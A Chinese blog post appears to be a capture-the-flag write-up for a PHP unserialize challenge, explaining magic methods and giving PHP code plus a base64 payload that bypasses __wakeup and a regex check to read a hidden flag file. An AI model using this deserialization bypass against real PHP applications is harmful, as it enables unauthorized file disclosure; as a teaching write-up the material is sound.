php安全攻防世界unserialize函数反序列化示例详解

 更新时间:2021年10月14日 14:13:34   作者:我是大肥鼠  
这篇文章主要介绍了php的安全防护,关于攻防世界Web php unserialize正则表达式反序列化示例详解,有需要的朋友可以借鉴参考下,希望能够有所帮助

在这里插入图片描述

步骤

首先打开题目,发现给了一段源码:

在这里插入图片描述

分析源码,发现类里面有三个魔术方法:

__construct():构造函数,对类的变量进行初始化,创建时自动调用,用得到的参数覆盖$file

__destruct():销毁时调用,会显示文件的代码,这里要显示fl4g.php

__wakeup():在进行反序列化之前会调用,会把$file重置成index.php

正则表达式的含义:o或c开头,冒号,一个或多个数字,不区分大小写

ok,分析完毕:我们要将序列化后的字符串进行base64加密之后进行get传参到var变量即可
但是这里我们可以看出需要绕过__wakeup()函数以及正则匹配,才能够拿到flag

__wakeup()方法绕过方法:当成员属性的数目大于实际数目的时候即可绕过此方法

正则匹配我们可以使用+来进行绕过

代码:

<?php
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}

$a = new Demo("fl4g.php");// 传入我们需要显示的文件
$b = serialize($a);// 进行序列化
echo $b;// O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
$b = str_replace("O:4", "O:+4", $b);// 绕过正则匹配
$b = str_replace("1:{","2:{",$b);// 绕过__wakeup()方法

echo base64_encode($b);// 进行base64编码并输出
?>

payload:var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

在这里插入图片描述

成功拿到flag~

注意:这里有个坑,要是直接将序列化之后的字符串进行手动修改再去找在线网站进行加密则会发现编码之后和我们payload里的不太一样

在这里插入图片描述

这是因为file变量为私有变量,所以序列化之后的字符串开头和结尾各有一个空白字符,而我们在对序列化之后的字符串进行输出时,浏览器则不显示空字符,如图:

在这里插入图片描述

细心的朋友也会发现Demofile只有8个字符,而长度却显示10。

所以正确的序列化字符串应该是

O:4:"Demo":1:{s:10:" Demo file";s:8:"fl4g.php";}

而我们由于是使用php代码直接进行编码的,全自动化,自然不会漏掉空字符。

解释一下php序列化字符串的格式:

首先对象类型分为以下几种

a - array                          b - boolean
d - double                        i - integer
o - common object           r - reference
s - string                         C - custom object
O - class                         N - null
R - pointer reference       U - unicode string

格式:对象类型:长度:"类名":类中变量的个数:{类型:长度:"值";类型:长度:"值";......}

总结

考察对php中魔术方法的熟悉程度,以及反序列化的应用

以上就是攻防世界Web php unserialize正则表达式反序列化详解的详细内容,更多关于php攻防世界unserialize正则表达式反序列化的资料请关注脚本之家其它相关文章!

相关文章

  • [PHP]实用函数8

    [PHP]实用函数8

    [PHP]实用函数8...
    2007-11-11
  • php查询mysql大量数据造成内存不足的解决方法

    php查询mysql大量数据造成内存不足的解决方法

    这篇文章主要介绍了php查询mysql大量数据造成内存不足的解决方法,实例分析了mysql查询时内存不足的原因与相应的解决方法,并且较为详细的分析了mysql_unbuffered_query函数的使用技巧,需要的朋友可以参考下
    2015-03-03
  • php实现 data url的图片生成与保存

    php实现 data url的图片生成与保存

    本文给大家介绍的是使用php实现的data url格式图片的生成与保存,非常的简单实用,有需要的小伙伴可以参考下
    2016-12-12
  • PHP+MySQL实现输入页码跳转到指定页面功能示例

    PHP+MySQL实现输入页码跳转到指定页面功能示例

    这篇文章主要介绍了PHP+MySQL实现输入页码跳转到指定页面功能,结合实例形式分析了php连接mysql数据库进行数据查询及分页显示、指定页数跳转显示等相关操作技巧,需要的朋友可以参考下
    2018-06-06
  • THINKPHP在添加数据的时候获取主键id的值方法

    THINKPHP在添加数据的时候获取主键id的值方法

    下面小编就为大家带来一篇THINKPHP在添加数据的时候获取主键id的值方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2017-04-04
  • php简单生成随机数的方法

    php简单生成随机数的方法

    这篇文章主要介绍了php简单生成随机数的方法,该功能可用于生成验证码,涉及php字符串及mt_rand方法的使用技巧,需要的朋友可以参考下
    2015-07-07
  • php使用Image Magick将PDF文件转换为JPG文件的方法

    php使用Image Magick将PDF文件转换为JPG文件的方法

    这篇文章主要介绍了php使用Image Magick将PDF文件转换为JPG文件的方法,涉及php使用Image Magick扩展操作图片的技巧,具有一定参考借鉴价值,需要的朋友可以参考下
    2015-04-04
  • php实现保存周期为1天的购物车类

    php实现保存周期为1天的购物车类

    这篇文章主要为大家详细介绍了php实现保存周期为1天的购物车类,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
    2017-07-07
  • PHP计算近1年的所有月份

    PHP计算近1年的所有月份

    本文主要介绍了PHP计算近1年的所有月份的实例。具有很好的参考价值。下面跟着小编一起来看下吧
    2017-03-03
  • PHP编程实现的TCP服务端和客户端功能示例

    PHP编程实现的TCP服务端和客户端功能示例

    这篇文章主要介绍了PHP编程实现的TCP服务端和客户端功能,结合实例形式分析了php基于socket实现TCP服务器端与客户端通信功能的相关配置、定义与使用技巧,需要的朋友可以参考下
    2018-04-04

最新评论